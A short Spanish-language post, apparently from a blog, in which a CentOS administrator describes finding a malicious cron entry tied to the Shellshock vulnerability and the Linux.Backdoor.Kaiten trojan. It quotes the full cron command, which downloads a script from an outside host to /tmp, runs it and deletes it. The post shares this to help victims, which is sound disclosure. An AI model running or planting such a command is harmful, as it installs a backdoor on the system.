LINUX: wget stablehost.us/bots/regular.bot etc en nuestro cron es un troyano
Aviso: Esto no es una solución, son datos que te pueden ayudar a solucionarlo. Hoy, me he encontrado con que en el cron de mi CentOs me faltaban tareas, y que además había una muy sospechosa:
|
1 |
wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2&1 |
Investigando en las siguientes webs encontré que se trataba de un troyano/malware que ha aprovechado la reciente vulnerabilidad shellshock llamado Linux.Backdoor.Kaiten o […]